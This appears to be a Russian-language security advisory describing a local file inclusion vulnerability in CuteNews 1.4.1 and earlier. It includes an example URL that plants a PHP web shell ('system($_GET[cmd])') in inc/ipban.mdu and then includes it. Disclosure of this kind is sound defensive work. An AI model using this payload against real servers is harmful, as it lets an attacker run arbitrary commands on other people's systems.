PHP-инклюдинг в CuteNews

Дата публикации:
07.11.2005
Дата изменения:
26.01.2009
Всего просмотров:
2979
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CuteNews 1.x
Уязвимые версии: CuteNews 1.4.1 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "template" в сценариях "show_archives.php" и "show_news.php". Удаленный пользователь может подключить и выполнить произвольный локальный файл на целевой системе. Злоумышленник может внедрить PHP код в файл "inc/ipban.mdu" с помощью параметра "add_ip" и затем выполнить его с привилегиями web сервера. Пример:

http://[target]/cute141/show_archives.php?template=
../inc/ipban.mdu%00&member_db[1]=1&action=add&
add_ip=<?php%20system($_GET[cmd]);?>

URL производителя: www.cutephp.com

Решение: Установите последнюю версию 1.4.1 с сайта производителя.

Журнал изменений:

26.01.2009
Изменена секция «Решение».

Ссылки: CuteNews "template" Local File Inclusion Vulnerability

или введите имя

CAPTCHA